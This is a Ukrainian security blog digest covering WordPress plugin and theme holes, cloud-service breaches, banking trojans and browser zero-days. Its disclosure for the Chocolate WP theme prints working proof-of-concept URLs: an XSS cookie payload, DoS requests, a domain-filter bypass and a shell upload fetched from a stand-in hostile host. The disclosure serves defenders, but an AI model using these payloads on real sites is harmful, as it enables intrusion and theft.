Websecurity - Веб безпека

Продовжуючи тему уразливостей в плагінах для WordPress, пропоную вам інформацію про дірки в інших плагінах для WP.

Цього разу повідомляю про уразливості в плагінах Asset-Manager, Photo Plus / Photo Search та SB Uploader. Для котрих з’явилися експлоіти. Asset-Manager - це плагін для управління документами і контролю версій, Photo Plus / Photo Search - це плагіни для роботи з фотографіями, SB Uploader - це плагін для завантаження зображень на сайт.

• WordPress Asset-Manager PHP File Upload (деталі)
• WordPress Photo Plus / Photo Search XSS / CSRF (деталі)
• WordPress SB Uploader 3.9 Shell Upload (деталі)

Користувачам даних плагінів варто або оновити їх, або власноруч виправити дірки. В якості тимчасового рішення, поки не будуть виправлені чи оновлені плагіни, можна їх виключити в адмінці.

За повідомленням www.xakep.ru, McAfee Labs прогнозує захід руху Anonymous.

У традиційному річному звіті Threat Predictions (Прогноз загроз) експерти McAfee Labs перелічують найбільш небезпечні тенденції в сфері інтернет-безпеки і роблять прогноз на майбутнє. Цікаво, що в 2013 році вони очікують зменшення кількості атак від хактивістського руху Anonymous.

Подивимося чи справдяться прогнози від McAfee та Symantec .

За повідомленням news.1k.by, взломаний хмарний сервіс Dropbox: компанія підсилює захист.

Влітку 2012 року постраждали користувачі, що довіряють свої файли хмарному сервісу Dropbox. Сотні користувачів почали скаржитися на велику кількість спам-повідомлень у своїх скриньках, і в Dropbox підтвердили, що це їхня провина: у ході недавнього взлому сайта компанії були вкрадені паролі й адреси електронної пошти користувачів. Повідомляється, що постраждало небагато користувачів.

Після цього випадку компанія додала двохфакторну аутентифікацію в свій сервіс. Як це часто трапляється, двохфакторну аутентифікацію додають лише після взлому (а то і багаторазового) власної системи - таке я бачив у багатьох компаніях, регулярно з’являються повідомлення в новинах про доданий OTP захист на сайтах. А щоб завчасно подумати про безпеку, то на це у компаній бажання немає, тільки коли користувачі й клієнти постраждають, тоді починають чухати потилицю.

При тому, що це не перший інцидент з Dropbox - в 2011 році були оприлюднені уразливості на цьому сервісі, що дозволяли отримати доступ до даних інших користувачів (і без будь-якої аутентифікації). Такі уразливості дозволили б обійти й двохфакторну аутентифікацію, тому це не панацея, як заявляють Dropbox і всі компанії, що впроваджують OTP. І якщо ті дірки в Dropbox вже виправлені, то через нові дірки можна буде обійти аутентифікацію та отримати доступ до даних користувачів.

За повідомленням www.xakep.ru, Google Drive: бекдор в Google-акаунт.

Якщо в користувача на комп’ютері встановлена програма Google Drive, то будь-який сторонній може легко зайти в його Google Account, а після цього - одержати доступ до всіх особистих документів, електронної пошти й щоденника.

Фахівці з безпеки попереджають, що ця уразливість присутня в усіх версіях десктопних клієнтів під Windows і Mac OS X. Програма не запитує пароль ні при запуску, ні при вході в акаунт через браузер.

Ще один дірявий хмарний сервіс для збереження файлів. Цей функціонал Google Drive дозволяє обійти аутентифікацію, в тому числі двохфакторну, в Google Account. Й за наявною інформацією, десктопний клієнт Dropbox працює таким самим чином. Що дозволяє обійти двохфакторну аутентифікацію і в цьому сервісі.

В статті Атаки на банковские системы розповідається про методи атак на банківські системи. Зокрема з використанням шкідливого програмного забезпечення, націленого на махінації із системами онлайн-банкінга. Це так звані банківські трояни - “банкери”. Які відомі вже багато років, але останнім часом вони стали більш поширеними зі зростанням кількості користувачів онлайн-банкінга. В статті описаний універсальний російський банківський троян Ibank.

В даній статті розглянуті наступні аспекти атак на системи ДБО:

• Огляд методів атаки
• Технології
• Мішені
• Схеми
• Аналіз шкідливої програми Ibank
• Загальні відомості
• Інсталяція й особливості функціонування
• Шпигунська діяльність
• Механізм збору даних
• Цільові системи
• Блокування антивірусів
• Мережева активність
• Віддалене керування
• Технологія автозаливу

Про уразливості в системі Інтернет-банкінгу IFOBS, що використовується багатьма українськими банками, я вже писав. Тому атакувати системи ДБО можна через уразливості в них. Або ж можна атакувати користувачів за допомогою троянів, як описано у даній статті. Таким чином тема безпеки онлайн-банкінгу зараз є дуже актуальною.

В даній добірці експлоіти в веб додатках:

• Microsoft SQL Server Database Link Crawling Command Execution (деталі)
• Thinksns Arbitrary File Upload Vulnerability (metasploit) (деталі)
• Ubiquiti AirOS <= 5.5.2 Remote POST-Auth Root Command Execution (деталі)
• Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free (деталі)
• Nagios Core 3.4.3 Buffer Overflow Vulnerability (деталі)

В презентації Malware mitigation, Ramses Gallego розповідає про шкідливе програмне забезпечення. Про поточну ситуацію зі шкідливим ПЗ в Інтернеті та про методи протидії йому.

0-day уразливість в Oracle Java використовується для встановлення шкідливого коду.

Уразливі версії: Oracle JDK 7, JRE 7.

Апплет може дати дозвіл самому собі.

• Java 7 Update 11 confirmed to be vulnerable (деталі)
• ‘Fix’ for Issue 32 exploited by new Java 0-day code (деталі)
• Oracle Java 7 Security Manager Bypass Vulnerability (деталі)

В даній добірці уразливості в веб додатках:

• Barracuda SSL VPN 680 - Cross Site Scripting Vulnerabilities (деталі)
• CubeCart 4.4.6 and lower | Cross Site Request Forgery (CSRF) Vulnerability (деталі)
• CubeCart 4.4.6 and lower | Multiple Cross Site Scripting Vulnerabilities (деталі)
• squidGuard 1.4 - Remote Denial of Service - POC (деталі)
• CubeCart 4.4.6 and lower | Multiple SQL Injection Vulnerabilities (деталі)
• CubeCart 4.4.6 and lower | Local File Inclusion Vulnerability (деталі)
• libGData, evolution-data-server vulnerability (деталі)
• CubeCart 4.x/5.x | Setup Re-installation Privilege Escalation Vulnerability (деталі)
• zendframework security update (деталі)
• Cross-Site Scripting (XSS) vulnerability in Quick.Cms and Quick.Cart (деталі)

Вчора я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality, Denial of Service та Arbitrary File Upload уразливості в темі Chocolate WP для WordPress. Про що вже повідомив розробникам.

XSS (WASC-08) (в старих версіях TimThumb):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=%3C111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/page.png&h=1111111&w=1

Abuse of Functionality (WASC-42):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

DoS (WASC-10):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site/big_file&h=1&w=1
http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1 (обхід обмежень на домен, якщо таке обмеження включене)

Arbitrary File Upload (WASC-31):

http://site/wp-content/themes/dt-chocolate/thumb.php?src=http://site.badsite.com/shell.php

Full path disclosure (WASC-13):

http://site/wp-content/themes/dt-chocolate/

Окрім index.php також можливі FPD в інших php-файлах в цій темі.

Уразливі всі версії теми Chocolate WP для WordPress.

Серед різних секюріті плагінів для WordPress, про деякі з них я вже розповідав, як то Wordfence, існує такий плагін як Cloudsafe365.

Раніше я вже писав про уразливість в Cloudsafe365.

Сам плагін Cloudsafe365 для WordPress є безкоштовним. Але є додаткові функції, які можна придбати на офіційному сайті. Для цього на сайті http://www.cloudsafe365.com потрібно підписатися на платну версію. Всього існує дві платні версії: Plus і Pro, що включають всі можливості Basic версії та багато інших функцій (при цьому версія Pro знаходиться в розробці й лише анонсована на сайті, доступною вона стане пізніше).

Cloudsafe365 представляє собою хмарний сервіс, реалізований у вигляді плагіна для WP. Він має чимало можливостей (особливо в платній версії), з яких виділю головні.

• Автоматичний бекап сайта.
• Захист від багатьох уразливостей.
• Захист контенту (щоб його було важче вкрасти, але це не захистить повністю, лише від автоматизованого копіювання контенту з сайта).
• Антивірусний сканер (сканування malware на сайтах).
• Моніторинг в реальному часі.

По наявності функції сканування malware на сайтах цей сервіс є безпосереднім конкурентом моїй Web VDS. По функції захисту від атак та уразливостей він подібний до вищезгаданого Wordfence та багатьох інших плагінів до WP, про які я вже писав.

Можливе використання пам’яті після звільнення в Microsoft Internet Explorer

Уразливі продукти: Microsoft Internet Explorer 6, 7, 8 під Windows XP, Windows 2003 Server, Windows Vista, Windows 2008 Server, Windows 7.

Використання пам’яті після звільнення в CButton використовується in-the-wild для встановлення шкідливого коду.

• Microsoft Security Bulletin MS13-008 - Critical Security Update for Internet Explorer (2799329) (деталі)